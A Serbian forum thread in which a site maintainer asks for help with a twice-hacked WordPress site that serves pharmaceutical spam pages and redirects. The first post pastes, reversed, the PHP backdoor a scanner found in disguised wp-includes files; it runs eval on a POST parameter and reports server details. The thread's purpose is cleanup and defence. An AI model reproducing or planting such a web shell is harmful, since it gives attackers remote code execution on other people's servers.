[ bambybg @ 22.03.2016. 10:27 ] @
Imam problem koji ne mogu da resim.
Preuzeo sam odrzavanje sajta koji je bio dva puta hakovan i Google ga je blokirao zbog toga; sajt je radjen u Wordpressu i kada sam proceprkao po njemu video sam dosta stranica koje postoje a ni jedan od dva prethodna administratora ih nije pravio kao npr.

"http://www.mojsajt.rs/sample-page/"

Poruka od WMToolsa je da postoji sumnjiv snippet

"small meals, 3 snacks daily <u><a href="http://www.mojsajt.rs/buy-ampi...mpicillin-category-ampicillin/">Buy Ampicillin In Us No Prescription Ampicillin</a></u>. "

"https://www.mojsajt.rs/vestibulum-semper-suscipit/"

"Usa No Prescription Clomid</a> | <a href="http://www.mojsajt.rs/buying-a...ount-prices-category-antabuse/">Buying Antabuse 500 On The Internet Discount Prices</a> "

Desava se kada se poseti sajt i klikne na neki od linkova stranica da prebaci na sajt 247.com ili slicno i nudi Vijagru, lekove bez recepta.......
Preko FTP-a sam fizicki obrisao sve te stranice koje su postojale a ne bi smele, Google cekirao sve i sve proslo, sajt odblokiran i onda odjednom se javlja jedan posetilac da mu iskace Vijagra opet.

Instalirao sam Anti-Malware from GOTMLS.NET i kada je pregledao svih 13.000 fajlova?!?! prijavio je da je stavio u karantin

".../public_html/wp-includes/functions.wp-date.php
.../public_html/wp-includes/class-wp-codex-cron.php"

i markirani kod koji je izbacio

";tixe
;)]'a'[TSOP_$ . 'noitca'(cnuf_resu_llac
) )]'a'[TSOP_$ . 'noitca'(stsixe_noitcnuf && )]'a'[TSOP_$(ytpme! (fi
;'ofnIceS' = ]'a'[TSOP_$
esle
;noitca_tluafed$ = ]'a'[TSOP_$
))noitca_tluafed$ . 'noitca'(stsixe_noitcnuf && )noitca_tluafed$(tessi(fi
) )]'a'[TSOP_$(ytpme (fi
}
}
;)]'1p'[TSOP_$(lave
{ esle }
;)a$(ezilaires ohce
;)
)'edom_efas'(teg_ini@ >= "edomefas"
,NOISREV_OSW >= "noisrev_osw"
,)(noisrevphp >= "noisrev_php"
,)(emanu_php >= "emanu"
(yarra = a$
{ )]'1p'[TSOP_$@!(fi
{ )(CRnoitca noitcnuf
}"

Kako da nadjem generator malware-a i eliminisem? Bilo kakvo iskustvo sa slicnim problemom ili predlog resenja.
[ cozi @ 22.03.2016. 11:20 ] @
Pregledaj sitemap i bazu (vidi da li ima linkova ka drugim sajtovima, ili cudnim stranicama na tvom sajtu), izbrisi sve pluginove i teme (sacuvaj export teme, css ako si je modifikovao), instaliraj novi wp, ponovo temu (novu), instaliraj ponovo pluginove (ako imas pluginove koji dolaze uz temu, onda instaliraj iz nove teme).

Pregledaj kada su poslednji put updejtovani pluginovi i tema, ako ih autor nije updejtovao vise od 6 meseci verovatno je odustao (ako je rec o free), i vidi da ih zamenis nekim koji se odrzavaju.

To bi trebalo da resi problem ako su preko tvog wp upadali, ako su preko servera (mada sumnjam), onda ti je najlakse da promenis hosting...
[ bambybg @ 23.03.2016. 12:15 ] @
Pregledao sam i nema nikakvih linkova ka drugim sajtovima; sto se tice teme, ona je specificna (namenska) i ja sam je "nasledio" od prethodnika i nisam siguran da li je platio koliko kosta (48 $), ali vidim da nije bilo nikakvih update-a odavno ili mozda cak i nikako; Plugine koje sam dodao sam azurirao, a oni iz teme nemaju nikakav update odavno.

Hosting je i dalje preko Svedske samo je preko novog naloga i nemam ideju kako je dolazilo do upada, a mislim da se dva puta desilo.